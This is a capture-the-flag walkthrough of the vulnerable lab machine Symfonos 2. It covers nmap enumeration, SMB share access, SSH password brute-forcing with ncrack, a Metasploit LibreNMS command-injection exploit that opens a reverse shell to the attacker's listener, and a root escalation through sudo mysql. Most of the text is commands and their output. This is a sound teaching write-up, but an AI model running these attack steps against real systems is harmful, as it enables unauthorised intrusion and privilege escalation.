Symfonos 2
This is the second of the Symfonos series by @zayotic. Its description is an OSCP-like Intermediate real life based machine designed to teach the importance of understanding a vulnerability and can be found here.
Enumeration
As always starting with a port scan to found out which ports are open and which services are running behind them.
PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA) | 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA) |_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519) 80/tcp open http WebFS httpd 1.21 |_http-server-header: webfs/1.21 |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) MAC Address: 00:0C:29:D7:5B:50 (VMware) Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -2s |_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: symfonos2 | NetBIOS computer name: SYMFONOS2\x00 | Domain name: \x00 | FQDN: symfonos2 |_ System time: 2019-08-02T01:16:44-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-08-02 08:16:44 |_ start_date: N/A
The following ports are open:
- 21 – runs FTP (ProFTP version 1.3.5)
- 22 – runs SSH (OpenSSH version 7.4p1)
- 80 – runs HTTP (WebFS version 1.21)
- 139 – SMB (smbd version 3.X-4.X)
- 445 – SMB (smbd version 4.5.16 – Debian)
FTP
Lets start with FTP as this version has a known vulnerability which let you execute certain commands without authentication.
root@cyberspace:~/symfonos2# nc 10.10.10.15 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.10.15] site help 214-The following SITE commands are recognized (* =>'s unimplemented) CPFR <sp> pathname CPTO <sp> pathname HELP CHGRP CHMOD 214 Direct comments to root@symfonos2
This are the commands available. I can copy files on the remote machine, change a group and change the permission on a file. It looks like this is a setup for a later stadium. These commands will give me some options once I have access. For now I’m going to check out the other options.
Webserver
This website consist out of an image. DirSearch can’t find any folder other than the main landing page. The source of the page holds no useful information. Next is the Samba server.
Samba
root@cyberspace:~/symfonos2# smbmap -r -H 10.10.10.15 [+] Finding open SMB ports.... [+] Guest SMB session established on 10.10.10.15... [+] IP: 10.10.10.15:445 Name: unkown Disk Permissions ---- ----------- print$ NO ACCESS anonymous READ ONLY ./ dr--r--r-- 0 Thu Jul 18 16:30:09 2019 . dr--r--r-- 0 Thu Jul 18 16:29:08 2019 .. dr--r--r-- 0 Thu Jul 18 16:25:17 2019 backups IPC$ NO ACCESS
Looks like a folder with some information I can read.
IPC$ NO ACCESS root@cyberspace:~/symfonos2# smbclient \\\\10.10.10.15\\anonymous Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Jul 18 16:30:09 2019 .. D 0 Thu Jul 18 16:29:08 2019 backups D 0 Thu Jul 18 16:25:17 2019 19728000 blocks of size 1024. 16313716 blocks available smb: \> cd backups smb: \backups\> ls . D 0 Thu Jul 18 16:25:17 2019 .. D 0 Thu Jul 18 16:30:09 2019 log.txt N 11394 Thu Jul 18 16:25:16 2019 19728000 blocks of size 1024. 16313716 blocks available smb: \backups\> get log.txt getting file \backups\log.txt of size 11394 as log.txt (3708.9 KiloBytes/sec) (average 3709.0 KiloBytes/sec)
The file is a log file with information about the samba config and the ftp config. In it there are some interesting things.
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous] path = /home/aeolus/share browseable = yes read only = yes guest ok = yes
I try to find more information, but at this time I really can not find any opening on how to get access to the machine. My last resort is brute forcing the username I found on the SSH server, but I really don’t like this option. It is very loud and in real life you really don’t want to try this as it can crash the server easily. But for now I think I don’t have a choice.
SSH
There are a lot of tools to brute force SSH, like patator, medusa, hydra, metasploit and many others. I’m going to use ncrack and tweak the threads so I don’t crash the server.
root@cyberspace:~/symfonos2# ncrack -v -u aeolus -P rockyou.txt 10.10.10.15:22 -T2
It took a really long time to crack this password as I’m on a VM. This is why I really don’t like brute forcing SSH. The long wait for this password is a bit disappointing.
Discovered credentials for ssh on 10.10.10.15 22/tcp: 10.10.10.15 22/tcp ssh: 'aeolus' 'sergioteamo'
With the password found I can finally access the remote machine.
root@cyberspace:~/symfonos2# ssh aeolus@10.10.10.15 aeolus@10.10.10.15's password: Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jul 18 08:52:59 2019 from 192.168.201.1 aeolus@symfonos2:~$
Escalation of Privileges (EoP)
Running ss shows the current sockets. From this there are some services listening only on localhost.
aeolus@symfonos2:~$ ss -tupan | grep -i listen tcp LISTEN 0 80 127.0.0.1:3306 *:* tcp LISTEN 0 50 *:139 *:* tcp LISTEN 0 128 127.0.0.1:8080 *:* tcp LISTEN 0 32 *:21 *:* tcp LISTEN 0 128 *:22 *:* tcp LISTEN 0 20 127.0.0.1:25 *:* tcp LISTEN 0 50 *:445 *:* tcp LISTEN 0 50 :::139 :::* tcp LISTEN 0 64 :::80 :::* tcp LISTEN 0 128 :::22 :::* tcp LISTEN 0 20 ::1:25 :::* tcp LISTEN 0 50 :::445 :::*
For this I create a SSH tunnel from my machine to the remote machine so it will forward all the traffic. In this case I can direct my browser to my localhost, port 8080 and it will be forwarded to the remote machine.
root@cyberspace:~/symfonos2# searchsploit librenms
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
LibreNMS - addhost Command Injection (Metasploit) | exploits/linux/remote/46970.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution | exploits/php/webapps/47044.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
There is a known vulnerability for LibreNMS. I choose the metasploit module to use. For this exploit I need valid credentials and as I only have one set….
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > options
Module options (exploit/linux/http/librenms_addhost_cmd_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD sergioteamo yes Password for LibreNMS
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base LibreNMS path
USERNAME aeolus yes User name for LibreNMS
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.10.16 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
[*] Started reverse TCP double handler on 10.10.10.16:9999
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname dyczzhbe
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dyczzhbe and id #1
[*] Command: echo vtPYmvTObe97GfCg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vtPYmvTObe97GfCg\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.10.16:9999 -> 10.10.10.15:50890) at 2019-08-02 14:37:25 +0200
id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
python -c 'import pty;pty.spawn("/bin/bash");'
cronus@symfonos2:/opt/librenms/html$
cronus@symfonos2:/opt/librenms/html$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
I can use sudo to access MySQL as root. With MySQL I can drop a shell giving me the permissions at that moment. In this case, root.
cronus@symfonos2:/opt/librenms/html$ sudo mysql sudo mysql Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 5560 Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> \! bash \! bash root@symfonos2:/opt/librenms/html# whoami whoami root
Time to finish this up.
root@symfonos2:~# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback!
Conclusion
I really enjoyed this challenge. In my opinion I would skip the brute forcing part and try and put in a better way to let people retrieve the password. Also I was surprised there was nothing left to do with the exploit on the FTP server.
But at the end, the challenge was pretty nice and I would like to thank the creator for some outstanding work. For now I’m done, but the next machine will be certainly the third and final part of this series.